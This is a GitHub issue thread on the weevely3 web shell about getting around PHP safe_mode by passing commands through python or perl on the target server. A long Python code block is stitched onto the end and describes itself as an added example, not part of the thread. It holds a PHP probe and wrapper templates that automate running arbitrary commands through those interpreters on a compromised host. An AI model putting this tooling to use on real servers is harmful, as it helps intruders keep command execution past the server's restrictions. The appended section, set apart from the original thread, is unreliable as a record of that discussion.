epinna/weevely3

bypass safe_mode and functions restriction

eltouco72 opened this issue · 6 comments

During pen testing, when we can upload the weevely shell, sometimes the server has PHP in safe mode or restricts some functions, so weevely cannot be in "system shell mode".
But even in that case, python or perl are sometimes installed on the server and can be executed.

I propose an enhancement: when weevely detects safe_mode or restricted functions and python or perl are available, execute shell commands through python or perl and not through PHP.

For instance, in a recent pentest PHP was in safe_mode and safe_mode_exec_dir was restricted to /usr/bin,
so commands like bash, ls or cat that live in /bin were not possible, whereas python and perl were found in /usr/bin, didn't have this restriction and could execute anything with os.system('ls -l') for instance.

Thanks for the good work, weevely is a nice shell. I wish I had sufficient programming skills to improve it, but I can only suggest improvements.

Thanks for the idea, I'll implement it in the next releases.

Hello Epinna,

Anything new on this? Did you stop this project?

Hey @eltouco72,
the best thing I can think of is to add a wrapper_function option to the shell_php module, expecting a primitive "template": a string with an "INSERT PAYLOAD HERE" marker. This way you could set up the trick you need to bypass safe_mode (which can be many things depending on its configuration).

For example, one would be able to do:

```
:shell_php -w "python -c '${command}'" ls -l
# And store its value for the current session
:set shell_php.wrapper_function "python -c '${command}'"
:shell_php ls -l
```

Would you agree with that?
I'll give that idea a try and make a PR soon.

Hey @ZanyMonk and @epinna,
thanks for the proposal.
Would it be difficult to detect if Perl or Python are present on the target,
and then automatically run commands that otherwise would be possible in PHP?

Maybe you could do both?
Python or Perl are very often installed on Linux systems (which means 90% of web servers).
Detect if Python or Perl are installed, then in case of safe_mode pass commands through Python or Perl so it is transparent for the weevely user.
If no Python or Perl is installed on the target, propose this wrapper to the user.
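The two proposals in this thread (a `wrapper_function` template with a `${command}` marker, and automatic detection of python/perl on the target to pass commands through when safe_mode is on) fit together as a small piece of client-side logic. The following is an added example written for this discussion; it is not code from weevely or from any participant, and the function names, the PHP probe string, the probe output format and the two wrapper templates are all assumptions made here for illustration. The wrapper templates pass the command as a separate, shell-quoted argument to the interpreter (`sys.argv[1]` / `$ARGV[0]`) rather than embedding it inside the interpreter's `-c`/`-e` string, so quotes and spaces in the command cannot break the wrapper. One caveat the example does not solve: a wrapper only helps when some PHP exec function is still callable on the target; if `disable_functions` removes every way to spawn a process, there is nothing for the wrapper to run through.

```python
"""Added example (not weevely's code): choose and apply an interpreter wrapper
around a shell command for a PHP target whose safe_mode restricts execution.
All names and formats here are assumptions for illustration."""
import shlex
import subprocess
from string import Template
from typing import Dict, Optional, Tuple

# Assumed wrapper templates. ${interp} is the interpreter path found on the
# target, ${command} is replaced with one shell-quoted argv word. `$$` is
# string.Template's escape for a literal `$` in the perl template.
WRAPPERS = {
    "python": "${interp} -c 'import os,sys; os.system(sys.argv[1])' ${command}",
    "perl": "${interp} -e 'system($$ARGV[0])' ${command}",
}

# Assumed PHP probe that the client would send once per session. It reports
# the safe_mode settings and the first python/perl binary found on PATH,
# one key=value per line, which parse_probe() below reads back.
PROBE_PHP = r'''
foreach (array("safe_mode", "safe_mode_exec_dir", "disable_functions") as $k)
    echo "$k=" . ini_get($k) . "\n";
foreach (array("python", "perl") as $i)
    foreach (explode(":", getenv("PATH") . ":/usr/bin:/usr/local/bin") as $d)
        if (is_executable("$d/$i")) { echo "$i=$d/$i\n"; break; }
'''


def parse_probe(output: str) -> Dict[str, str]:
    """Turn the probe's key=value lines into a dict (constructed format)."""
    info: Dict[str, str] = {}
    for line in output.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            info[key.strip()] = value.strip()
    return info


def apply_wrapper(template: str, command: str, interp: str = "") -> str:
    """Substitute the shell-quoted command into a template with a ${command}
    marker. The marker must sit where a single shell word is expected."""
    if "${command}" not in template:
        raise ValueError("wrapper template lacks the ${command} marker")
    return Template(template).substitute(command=shlex.quote(command), interp=interp)


def choose_wrapper(info: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (template, interpreter path) when safe_mode is on and a usable
    interpreter exists, or None when plain PHP execution should be used."""
    safe_mode = info.get("safe_mode", "") not in ("", "0", "Off", "off")
    if not safe_mode:
        return None
    exec_dir = info.get("safe_mode_exec_dir", "").rstrip("/")
    for name in ("python", "perl"):
        path = info.get(name, "")
        if not path:
            continue
        # With safe_mode_exec_dir set, PHP only runs binaries inside that
        # directory, so the interpreter itself has to live there.
        if exec_dir and not path.startswith(exec_dir + "/"):
            continue
        return WRAPPERS[name], path
    return None


def build_command(command: str, info: Dict[str, str],
                  user_template: Optional[str] = None) -> str:
    """Produce the shell line to hand to the PHP exec function: an explicit
    user template wins, otherwise the probe decides whether to wrap."""
    if user_template:
        return apply_wrapper(user_template, command)
    chosen = choose_wrapper(info)
    if chosen is None:
        return command
    template, interp = chosen
    return apply_wrapper(template, command, interp=interp)


def run_locally(line: str) -> str:
    """Convenience for trying a wrapped line on your own box (needs the
    interpreter named in the line to exist locally)."""
    return subprocess.run(line, shell=True, capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Constructed probe output mirroring the case described in the thread:
    # safe_mode on, safe_mode_exec_dir=/usr/bin, python and perl in /usr/bin.
    sample = "safe_mode=1\nsafe_mode_exec_dir=/usr/bin\ndisable_functions=\n" \
             "python=/usr/bin/python\nperl=/usr/bin/perl\n"
    print(build_command("ls -l /bin", parse_probe(sample)))
```

`build_command` is the only entry point a `shell_php`-style module would need: call it with the probe result stored for the session and the user's command, and send whatever it returns to the PHP exec primitive as usual.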